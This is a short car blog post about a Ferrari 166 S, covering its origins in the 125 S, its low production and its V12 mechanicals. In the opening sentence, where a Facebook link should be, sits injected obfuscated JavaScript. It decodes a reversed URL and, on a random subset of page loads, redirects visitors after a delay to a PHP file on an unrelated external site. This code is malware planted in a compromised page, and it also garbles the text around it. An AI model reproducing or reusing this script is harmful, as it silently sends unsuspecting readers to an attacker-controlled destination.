We just popped this stunning original/barn find look Ferrari 166 S up on our $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston”>Facebook page and seeing as though we had some excited responses, I thought I’d pop it up on here.
From a historical perspective the Ferrari 166 S was an evolution of Ferrari’s 125 S sports race car that became a sports car for the street in the form of the 166 Inter. As far as we can find out there were only three Ferrari 166 S’s made, as it was immediatley improved on, in the form of the 166 Mille Miglia which entered production in 1949 and had a good run of it through to 1952.
When it came to the mechanicals it was old school power all the way. With a Aurelio Lampredi designed tube frame and the ubiquitous double wishbone, live axle suspension set-up. The little 166 was shoved down the road by a pretty wild motor! Riding up front was a single overhead camshaft 2.0 V12, pumping out a tyre shredding 140 hp at 6,000 rpm with three carburettors affixed atop the motor.
A stunning and timeless machine I think you will agree.
